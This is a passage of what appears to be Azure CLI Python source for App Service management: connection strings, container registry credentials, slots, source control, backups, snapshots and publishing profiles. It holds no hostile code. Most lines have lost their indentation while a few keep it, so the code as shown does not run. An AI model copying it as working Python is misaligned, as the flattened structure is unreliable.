azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
    import platform
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
        # split at the first '='; a connection string name should not contain '='
        conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
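# Illustrative sketch (hypothetical helper, for documentation only): the
# name=value parsing used by update_connection_strings splits only at the first
# '=', so the value may itself contain '='; surrounding quotes are stripped.
# The connection string below is made up.
def _example_connection_string_parsing():
    name_value = 'MyDb="Server=tcp:example.database.windows.net;Password=secret"'
    conn_string_name, value = name_value.split('=', 1)
    if value[0] in ["'", '"']:
        value = value[1:-1]
    return conn_string_name, value  # ('MyDb', 'Server=tcp:example.database.windows.net;Password=secret')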
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Must specify both --multicontainer-config-file FILE and --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
    if not result or len(result) > 1:
        raise CLIError("Found either no container registry or more than one with the name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
        raise CLIError('The following parameters have no effect when cd_project_url is None: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
                       'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # throw immediately unless the failure is a server error (50x); otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
    Update the source control token cached in Azure App Service. If no token is provided,
    the command will clear the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise MutuallyExclusiveArgumentError('Usage error: --is-linux and --hyper-v cannot be used together.')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise ArgumentUsageError('Windows containers are not yet supported in an App Service Environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
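# Illustrative sketch (hypothetical helper, for documentation only): _parse_frequency
# accepts values such as '7d' (every 7 days) or '12h' (every 12 hours) and returns the
# numeric interval together with the matching FrequencyUnit member; the mapping below
# only mirrors that behaviour with plain strings.
def _example_parse_frequency(frequency='7d'):
    unit = {'d': 'Day', 'h': 'Hour'}.get(frequency.lower()[-1])
    if unit is None:
        raise ValueError('Frequency must end with d or h for "day" or "hour"')
    return int(frequency[:-1]), unit  # e.g. (7, 'Day')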
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
                # strip the leading '@' that xmltodict adds for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
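# Illustrative sketch (hypothetical helper, for documentation only): xmltodict
# prefixes XML attributes with '@', which list_publish_profiles strips before
# returning the profiles. The profile data below is made up.
def _example_strip_xmltodict_attribute_prefix():
    profile = {'@profileName': 'mysite - Web Deploy', '@publishMethod': 'MSDeploy'}
    return {key.lstrip('@'): value for key, value in profile.items()}
    # -> {'profileName': 'mysite - Web Deploy', 'publishMethod': 'MSDeploy'}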
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
